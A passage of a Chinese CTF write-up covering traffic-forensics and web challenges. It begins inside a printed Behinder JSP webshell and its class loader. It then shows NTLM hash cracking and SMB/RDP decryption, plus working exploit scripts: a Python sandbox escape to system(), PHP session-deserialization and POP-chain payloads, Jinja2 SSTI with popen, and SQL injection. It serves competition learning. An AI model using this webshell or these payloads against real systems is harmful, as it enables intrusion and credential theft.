HBTZXJ2bGV0UmVxdWVzdAwBCQEKAQARZ2V0RGlzcGF0Y2hlclR5cGUBACIoKUxqYWthcnRhL3NlcnZsZXQvRGlzcGF0Y2hlclR5cGU7CgEAAQwMAQ0AMAEABmVxdWFscwsBBgEPDABVARABABQoKUxqYXZhL2xhbmcvU3RyaW5nOwgBEgEAB09QVElPTlMKAG8BDAgBFQEABUFsbG93CAEXAQAYR0VULCBIRUFELCBQT1NULCBPUFRJT05TCwEZARsHARoBAChqYWthcnRhL3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlDAEcAR0BAAlzZXRIZWFkZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7KVYIAR8BAANHRVQIASEBAARQT1NUCAEjAQAESEVBRAgBJQEAP0pTUHMgb25seSBwZXJtaXQgR0VULCBQT1NUIG9yIEhFQUQuIEphc3BlciBhbHNvIHBlcm1pdHMgT1BUSU9OUwsBGQEnDAEoASkBAAlzZW5kRXJyb3IBABYoSUxqYXZhL2xhbmcvU3RyaW5nOylWCAErAQAJdGV4dC9odG1sCwEZAS0MAS4BLwEADnNldENvbnRlbnRUeXBlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWCgAbATEMATIBMwEADmdldFBhZ2VDb250ZXh0AQCSKExqYWthcnRhL3NlcnZsZXQvU2VydmxldDtMamFrYXJ0YS9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0O0xqYWthcnRhL3NlcnZsZXQvU2VydmxldFJlc3BvbnNlO0xqYXZhL2xhbmcvU3RyaW5nO1pJWilMamFrYXJ0YS9zZXJ2bGV0L2pzcC9QYWdlQ29udGV4dDsKATUA4QcBNgEAH2pha2FydGEvc2VydmxldC9qc3AvUGFnZUNvbnRleHQKATUA2woBNQE5DAE6ATsBAApnZXRTZXNzaW9uAQAkKClMamFrYXJ0YS9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb247CgE1AT0MAT4BPwEABmdldE91dAEAISgpTGpha2FydGEvc2VydmxldC9qc3AvSnNwV3JpdGVyOwoBQQFDBwFCAQAdamFrYXJ0YS9zZXJ2bGV0L2pzcC9Kc3BXcml0ZXIMAKgAoQoAnQAlCwEGAUYMAUcBSAEADmdldElucHV0U3RyZWFtAQAmKClMamFrYXJ0YS9zZXJ2bGV0L1NlcnZsZXRJbnB1dFN0cmVhbTsKAUoBTAcBSwEAImpha2FydGEvc2VydmxldC9TZXJ2bGV0SW5wdXRTdHJlYW0MAU0ApQEABHJlYWQKAU8BUQcBUAEAEGphdmEvdXRpbC9BcnJheXMMAVIBUwEAC2NvcHlPZlJhbmdlAQAIKFtCSUkpW0IKAJ0BVQwAqABzCgFBAVcMAVgAGAEABWNsZWFyCgE1AVoMAVsBXAEACHB1c2hCb2R5AQAqKClMamFrYXJ0YS9zZXJ2bGV0L2pzcC90YWdleHQvQm9keUNvbnRlbnQ7BwFeAQAeb3JnL2FwYWNoZS9qc3AveHZDdzhSR1hGX2pzcCRVCgBMAWAMAWEBYgEADmdldENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwoBXQFkDAAmAWUBADgoTG9yZy9hcGFjaGUvanNwL3h2Q3c4UkdYRl9qc3A7TGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgoAAQFnDABEAEUKAV0BaQwBagFrAQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwoAXgEMBwFuAQAlamFrYXJ0YS9zZXJ2bGV0L2pzcC9Ta2lwUGFnZUV4Y2VwdGlvbgoBQQFwDAFxAXIBAA1nZXRCdWZmZXJTaXplAQADKClJCwEZAXQMAXUArQEAC2lzQ29tbWl0dGVkCgFBAXcMAXgAGAEABWZsdXNoCgFBAXoMAXsAGAEAC2NsZWFyQnVmZmVyCgE1AX0MAX4BfwEAE2hhbmRsZVBhZ2VFeGNlcHRpb24BABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYKAP0BgQwAJgF/CgAbAYMMAYQBhQEAEnJlbGVhc2VQYWdlQ29udGV4dAEAJChMamFrYXJ0YS9zZXJ2bGV0L2pzcC9QYWdlQ29udGV4dDspVgEAB3JlcXVlc3QBAClMamFrYXJ0YS9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAqTGpha2FydGEvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAMX2pzcHhfbWV0aG9kAQALcGFnZ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";map.put("xvCw8RGXF_jsp", xvCw8RGXF_jsp);
String[] split = name.split("\\.");
byte[] classBytes = null;
classBytes = Base64.getDecoder().decode(map.get(split[split.length - 1]));
Method democlass = null;
Class<?> aClass = null;
try {
democlass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
Method setAccessible = AccessibleObject.class.getMethod("setAccessible", boolean.class);
setAccessible.invoke(democlass,true);
aClass = (Class<?>)democlass./*a*/
invoke(this, name, classBytes, 0, classBytes.length);
} catch (Exception e) {
e.printStackTrace();
}
return aClass;
}
}
%>
<%
JspServlet jspServlet = new JspServlet();
JspClassLoader jspClassLoader = new JspClassLoader(jspServlet.getClass().getClassLoader());
HttpJspBase httpJspBase = (HttpJspBase) jspClassLoader.findClass("org.apache.jsp.gALahVBOe_jsp")./*a*/
newInstance();
StandardWrapperFacade standardWrapperFacade = new StandardWrapperFacade(new StandardWrapper());
Field config1 = standardWrapperFacade.getClass().getDeclaredField("config");
config1.setAccessible(true);
config1.set(standardWrapperFacade, pageContext.getServletConfig());
Field context = standardWrapperFacade.getClass().getDeclaredField("context");
context.setAccessible(true);
context.set(standardWrapperFacade, pageContext.getServletContext());
httpJspBase.init(standardWrapperFacade);
httpJspBase.service(request, response);
%>
4、第 253 个流中,第二个请求包发送之后响应包的状态码为 200,即登录成功
base64 解密 dG9tY2F0OmJlYXV0aWZ1bA==得到 tomcat:beautiful
5、随处可见的 /help/help.jsp
6、根据 jsp 的样式判断为冰蝎马 也就是 behinder
7、解密包中获得一个 sqlite 文件
解密得到密码
8、挖矿程序解密请求包中可以获得 mine 相关信息
9、注意到上面挖矿程序的 config.json
想起来在流量包中正好有一个请求包
4.5 谍影重重 5.0
前面的 SMB 解密参考
https://malwarelab.eu/posts/tryhackme-smb-decryption/
1
2
3
4
# username domain ntproofstr ntresponse
tshark -n -r 谍影重重5.0.pcapng -Y 'ntlmssp.messagetype == 0x00000003' -T fields -e ntlmssp.auth.username -e ntlmssp.auth.domain -e ntlmssp.ntlmv2_response.ntproofstr -e ntlmssp.auth.ntresponse > res1.txt
# ntlmserverchallenge
tshark -n -r 谍影重重5.0.pcapng -Y 'ntlmssp.messagetype == 0x00000002' -T fields -e ntlmssp.ntlmserverchallenge > res2.txt
得到
1
2
abcdefgh::.:948b51874d5c190c:a34b79f6c9fe4a1e4401b6f04b0f4423:0101000000000000106c950cb92adb01b8926c1772e66b3f0000000002001e004400450053004b0054004f0050002d004a0030004500450039004d00520001001e004400450053004b0054004f0050002d004a0030004500450039004d00520004001e004400450053004b0054004f0050002d004a0030004500450039004d00520003001e004400450053004b0054004f0050002d004a0030004500450039004d00520007000800106c950cb92adb0106000400020000000800300030000000000000000100000000200000bd69d88e01f6425e6c1d7f796d55f11bd4bdcb27c845c6ebfac35b8a3acc42c20a001000000000000000000000000000000000000900260063006900660073002f003100370032002e00310036002e003100300035002e003100320039000000000000000000
tom::.:c1dec53240124487:ca32f9b5b48c04ccfa96f35213d63d75:010100000000000040d0731fb92adb01221434d6e24970170000000002001e004400450053004b0054004f0050002d004a0030004500450039004d00520001001e004400450053004b0054004f0050002d004a0030004500450039004d00520004001e004400450053004b0054004f0050002d004a0030004500450039004d00520003001e004400450053004b0054004f0050002d004a0030004500450039004d0052000700080040d0731fb92adb0106000400020000000800300030000000000000000100000000200000bd69d88e01f6425e6c1d7f796d55f11bd4bdcb27c845c6ebfac35b8a3acc42c20a001000000000000000000000000000000000000900260063006900660073002f003100370032002e00310036002e003100300035002e003100320039000000000000000000
存储为 txt 用 hashcat 爆破,得到 tom 用户密码 babygirl233
1
TOM::.:c1dec53240124487:ca32f9b5b48c04ccfa96f35213d63d75:010100000000000040d0731fb92adb01221434d6e24970170000000002001e0044004500530 004b0054004f0050002d004a0030004500450039004d00520001001e004400450053004b0054004f0050002d004a0030004500450039004d00520004001e004400450 0053004b0054004f0050002d004a0030004500450039004d00520003001e004400450053004b0054004f0050002d004a0030004500450039004d0052000700080040d d0731fb92adb0106000400020000000800300030000000000000000100000000200000bd69d88e01f6425e6c1d7f796d55f11bd4bdcb27c845c6ebfac35b8a3acc42c c20a001000000000000000000000000000000000000900260063006900660073002f003100370032002e00310036002e003100300035002e003100320039000000000 0000000000:babygirl233
接着继续跟着文章复现拿到 session key
1
2
3
4
# username domain ntproofstr sessionkey sessionid
tshark -n -r 谍影重重5.0.pcapng -Y 'ntlmssp.messagetype == 0x00000003' -T fields -e ntlmssp.auth.username -e ntlmssp.auth.domain -e ntlmssp.ntlmv2_response.ntproofstr -e ntlmssp.auth.sesskey -e smb2.sesid > res3.txt
# ntlmserverchallenge
tshark -n -r 谍影重重5.0.pcapng -Y 'ntlmssp.messagetype == 0x00000002' -T fields -e ntlmssp.ntlmserverchallenge > res4.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from Crypto.Cipher import ARC4
from Crypto.Hash import MD4, MD5, HMAC
password = 'babygirl233'
passwordHash = MD4.new(password.encode('utf-16-le')).hexdigest()
username = 'tom'
domain = '.'
ntProofStr = 'ca32f9b5b48c04ccfa96f35213d63d75'
serverChallenge = 'c1dec53240124487'
sessionKey = '5643a37f253b00b2f52df1afd48c1514'
responseKey = HMAC.new(bytes.fromhex(passwordHash), (username.upper()+domain.upper()).encode('utf-16-le'), MD5).digest()
keyExchangeKey = HMAC.new(responseKey, bytes.fromhex(ntProofStr), MD5).digest()
decryptedSessionKey = ARC4.new(keyExchangeKey).decrypt(bytes.fromhex(sessionKey))
print('Decrypted SMB Session Key is: {}'.format(decryptedSessionKey.hex()))
# Decrypted SMB Session Key is: a3abe4d64394909a641062342ffe291b
获取会话 ID 和会话密钥:
1
0900000000100000 a3abe4d64394909a641062342ffe291b
在 wireshark 中导入会话 ID 和密钥可以导出 smb 对象
提取后三个文件
接着参考这篇博客 https://blog.csdn.net/weixin_39934520/article/details/122014291
直接对着导出来的 pfx 使用同样的命令和密码
1
2
openssl pkcs12 -in dycc.pfx -nocerts -nodes -out private.key
Enter Import Password: mimiakatz
拿到私钥后,在 TLS 中导入 key,还原 rdp
之后就是跟博客重复同样的操作,但是 RDP 工具安装不上,直接看 RDP 流量,发现有 mouse 流量和 scancode 流量
主要看 scancode 流量
keycode 用 tshark 提取 rdp.fastpath.scancode.keycode 也有点问题,直接手搓得到
1
1c 14 23 12 2a 39 08 2c 39 19 1e 1f 1f 11 18 13 20 39 17 1f 39 21 28 2a 1a 11 17 31 20 18 11 1f 2a 0c 19 1e 1f 1f 11 18 13 20 2a 1b 0a 04 05 08 0b 02 04 02 09 03 28 1d 1f
在网上找到 scancode 对应键盘上的字符
让 gpt 转成字典
再让它直接将输入字符对应字典输出
将 shift、space 字符剔除,整理一下得到
1
Enter THE 7Z PASSWORD IS F'[WINDOWS-PASSWORD]9347013182'
因此 flag.7z 的压缩包密码就是 babygirl2339347013182
解压得到 flag
flag{fa32a0b2-dc26-41f9-a5cc-1a48ca7b2ddd}
5. Web
5.1 PyBlockly
在 block_type== ‘print’处,text 内容可以通过 block_type == ‘text’获取,这里用 unidecode.unidecode 解码导致可以使用全角字符绕过 check_for_blacklisted_symbols 的限制
先用’)闭合 print, 后面的内容可以用#号注释后面的内容,中间回车即可逃逸
这里限制了长度要小于等于 4,open 可以绕过过滤,进行任意文件读取
1
2
3
4
5
6
7
8
9
10
11
12
import requests
# burp0_url = "http://10.45.133.108:5000/blockly_json"
burp0_url="http://eci-2zecsejgdlgg4f2j75k2.cloudeci1.ichunqiu.com:5000/blockly_json"
burp0_headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36", "Content-Type": "application/json", "Origin": "http://10.45.133.108:5000", "Referer": "http://10.45.133.108:5000/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
burp0_json={"blocks":{"languageVersion":0,"blocks":[{"type":"print","id":"5?,O$5;|6hmZ)ypq0^+C","x":252,"y":165,"inputs":{"TEXT":{"block":{"type":"text","id":"+8hjG^l`1Sgw#Skm]H*+","fields":{"TEXT":'''’)
a=open (”/proc/self/cmdline“)。read()
print(a)
#\‘'''}}}}}]}}
r=requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
print(r.text)
发现读不到 flag,应该是没权限,所以还是要命令执行
可以自定义 len 函数进行覆盖,之后就可以调用 system 执行命令,进入后是 suid 提权,dd 读 flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
import requests
# burp0_url = "http://10.45.133.108:5000/blockly_json"
burp0_url="http://eci-2zecsejgdlgg4f2j75k2.cloudeci1.ichunqiu.com:5000/blockly_json"
burp0_headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36", "Content-Type": "application/json", "Origin": "http://10.45.133.108:5000", "Referer": "http://10.45.133.108:5000/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
burp0_json={"blocks":{"languageVersion":0,"blocks":[{"type":"print","id":"5?,O$5;|6hmZ)ypq0^+C","x":252,"y":165,"inputs":{"TEXT":{"block":{"type":"text","id":"+8hjG^l`1Sgw#Skm]H*+","fields":{"TEXT":'''’)
def len(a):
return 0
a=__import__(“os”)。system(“dd if=/flag”)
print(a)
#\‘'''}}}}}]}}
r=requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
print(r.text)
5.2 xiaohuanxiong
小浣熊 cms 直接找 cms 源代码审计 https://github.com/Empty2081/raccoon5/tree/b296de5236c268c9e5b5e2a918c1cadc073329e4
存在一个添加管理员的路由,http://59.110.156.237:30783/admin/admins/create.html 添加管理员进后台
在支付管理执行命令并输出
再次访问 http://59.110.156.237:30783/admin 即输出 flag
5.3 platform
目录扫描,扫到源码 www.zip
1
2
3
4
5
6
7
8
[21:28:24] 302 - 0B - /dashboard.php -> login.php
[21:28:30] 200 - 2KB - /index.php
[21:28:30] 200 - 2KB - /index.php/login/
[21:28:32] 200 - 2KB - /login.php
[21:28:44] 403 - 312B - /server-status/
[21:28:44] 403 - 312B - /server-status
[21:28:50] 200 - 0B - /user.php
[21:28:53] 200 - 3KB - /www.zip
通过审计可以发现都是围绕着 session,猜测打 session 反序列化
由于没有用 php_serialize 不存在解析差异漏洞,默认用的是 php 处理器,本来是没有反序列化漏洞的,但这里使用了 str_replace 导致了反序列化变短逃逸
根据限制条件,需要先访问获取一个新的 PHPSESSID,然后第一次访问我们的 payload 写进 session 的文件,接着第二次访问进行变短替换,再去访问 dashboard.php 触发反序列化并获取回显
由于所使用的 session 是随机生成并且长度不固定
所以构造出来的 payload 有 1/49 的概率能打通,因此通过循环发包,直到顺利执行命令
最终 exp 如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests
url="http://eci-2zecsejgdlggcsy9foif.cloudeci1.ichunqiu.com/"
# url="http://localhost:9000/index.php"
def login():
# data={"username":"passthrupassthrupassthrupassthrupassthrupassthrupassthru",
# "password":''';session_key|s:12:"q6v03IOkyLDR";password|O:15:"notouchitsclass":1:{s:4:"data";s:17:"sysystemstem('whoami');";}'''}
# data={"username":"passthrupassthrupassthrupassthrupassthrupassthrupassthru",
# "password":''';session_key|s:12:"q6v03IOkyLDR";password|O:15:"notouchitsclass":1:{s:4:"data";s:15:"sysystemstem('ls /');";}'''}
data={"username":"passthrupassthrupassthrupassthrupassthrupassthrupassthru",
"password":''';session_key|s:12:"q6v03IOkyLDR";password|O:15:"notouchitsclass":1:{s:4:"data";s:20:"sysystemstem('/readflag');";}'''}
res=requests.get(url=url)
cookie={"PHPSESSID":res.cookies.get("PHPSESSID")}
res=requests.post(url=url,data=data,cookies=cookie)
res=requests.post(url=url,data=data,cookies=cookie)
res=requests.get(url=url+"dashboard.php",cookies=cookie)
if "passthru" not in res.text and "用户登录" not in res.text:
print(res.text)
for i in range(100):
login()
5.4 snake
啥也没有 先玩贪吃蛇
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import requests
import json
def print_game_board(snake, food, board_size=20):
# 创建一个空的游戏板
board = [['.' for _ in range(board_size)] for _ in range(board_size)]
# 标记食物的位置
food_x, food_y = food
board[food_y][food_x] = 'F' # 'F'代表食物
# 标记贪吃蛇的位置
for segment in snake:
snake_x, snake_y = segment
board[snake_y][snake_x] = 'S' # 'S'代表贪吃蛇
# 打印游戏板
for row in board:
print(' '.join(row))
burp0_url = "http://eci-2ze3vvqmif94trv6i3um.cloudeci1.ichunqiu.com:5000/move"
burp0_cookies = {"session": "eyJ1c2VybmFtZSI6ImFzZHF3ZSJ9.ZyZP2g.wWLTnbkKO14Sopo8DMXjIrQFvJc"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36", "Content-Type": "application/json", "Accept": "*/*", "Origin": "http://eci-2ze3vvqmif94trv6i3um.cloudeci1.ichunqiu.com:5000", "Referer": "http://eci-2ze3vvqmif94trv6i3um.cloudeci1.ichunqiu.com:5000/", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
while 1:
# choose = input('To:')
# print(choose)
choose = 'wwwwwwwwwwwwwwwwwwassssssssssssssssssawwwwwwwwwwwwwwwwwwassssssssssssssssssawwwwwwwwwwwwwwwwwwassssssssssssssssssawwwwwwwwwwwwwwwwwwassssssssssssssssssawwwwwwwwwwwwwwwwwwassssssssssssssssssawwwwwwwwwwwwwwwwwwassssssssssssssssssawwwwwwwwwwwwwwwwwwassssssssssssssssssawwwwwwwwwwwwwwwwwwassssssssssssssssssawwwwwwwwwwwwwwwwwwassssssssssssssssssawwwwwwwwwwwwwwwwwwwdddddddddddddddddddsssssssssssssssssssa'
for direction in choose:
print('[+]'+direction)
if direction == 'w':
burp0_json={"direction": "UP"}
elif direction == 's':
burp0_json={"direction": "DOWN"}
elif direction == 'a':
burp0_json={"direction": "LEFT"}
elif direction == 'd':
burp0_json={"direction": "RIGHT"}
a = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, json=burp0_json)
if 'win' in a.text:
print(a.text)
exit()
result = json.loads(a.text)
# 给定的坐标
data = {
"food": result['food'],
"snake": result['snake'],
}
# 调用函数打印游戏板
print_game_board(data["snake"], data["food"])
得到一个路由
1
{"status":"win","url":"/snake_win?username=asdqwe"}
尝试 sql 注入 发现能成功 但是很奇怪 好像有过滤好像又不太过滤
乱注发现能注到 users 的 id、username 但是数据库名之类的尝试多次未能获取
1
http://eci-2ze3vvqmif94trv6i3um.cloudeci1.ichunqiu.com:5000/snake_win?username=-1'union select 1,2,group_concat(username) from users--%2B
多次尝试之后仍无思路 尝试对 username 参数进行 ssti 也无果
后面尝试在最开始进行 ssti 的名称注入 然后后面进行 username 的注入让其渲染 发现竟然可以??????
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /set_username HTTP/1.1
Host: eci-2ze816q8joaksgqms515.cloudeci1.ichunqiu.com:5000
Content-Length: 115
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://eci-2ze816q8joaksgqms515.cloudeci1.ichunqiu.com:5000
Referer: http://eci-2ze816q8joaksgqms515.cloudeci1.ichunqiu.com:5000/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1729480567,1730517757
Connection: close
username={{lipsum.__globals__.__builtins__.__import__("os")["popen"]("cat+/flag").read()}}
1
http://eci-2ze3vvqmif94trv6i3um.cloudeci1.ichunqiu.com:5000/snake_win?username=-1'union select 1,2,group_concat(username) from users--%2B
即可得到 flag
5.5 Password Game
提示是一个密码游戏,通过计算可以使得密码满足 3 个规则,然后获得部分源代码
1
2
3
1.含有大小写字母和数字
2.数字之和是某个数的倍数
3.某个计算式的结果出现在密码中
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
function filter($password){
$filter_arr = array("admin","2024qwb");
$filter = '/'.implode("|",$filter_arr).'/i';
return preg_replace($filter,"nonono",$password);
}
class guest{
public $username;
public $value;
public function __tostring(){
if($this->username=="guest"){
$value();
}
return $this->username;
}
public function __call($key,$value){
if($this->username==md5($GLOBALS["flag"])){
echo $GLOBALS["flag"];
}
}
}
class root{
public $username;
public $value;
public function __get($key){
if(strpos($this->username, "admin") == 0 && $this->value == "2024qwb"){
$this->value = $GLOBALS["flag"];
echo md5("hello:".$this->value);
}
}
}
class user{
public $username;
public $password;
public $value;
public function __invoke(){
$this->username=md5($GLOBALS["flag"]);
return $this->password->guess();
}
public function __destruct(){
if(strpos($this->username, "admin") == 0 ){
echo "hello".$this->username;
}
}
}
$user=unserialize(filter($_POST["password"]));
if(strpos($user->username, "admin") == 0 && $user->password == "2024qwb"){
echo "hello!";
}
经过测试发现,反序列化的内容依然要满足上述 3 个条件才能进行反序列化
这里需要通过引用反序列化,使得 user 的 username 引用 root 的 value,让反序列化返回 root 类,然后调用 password 时就会调用 root 的_get 使 root.value=flag,由于都是弱类型比较,
所以只要让 username 不包含 admin,value 的值为 2024 即可绕过过滤
最后在 user.__destruct 时输出 flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
class root{
public $username="a";
public $value=2024;
}
class user{
public $username;
public $password="";
public $value="222";
}
$u=new User();
$r1=new root();
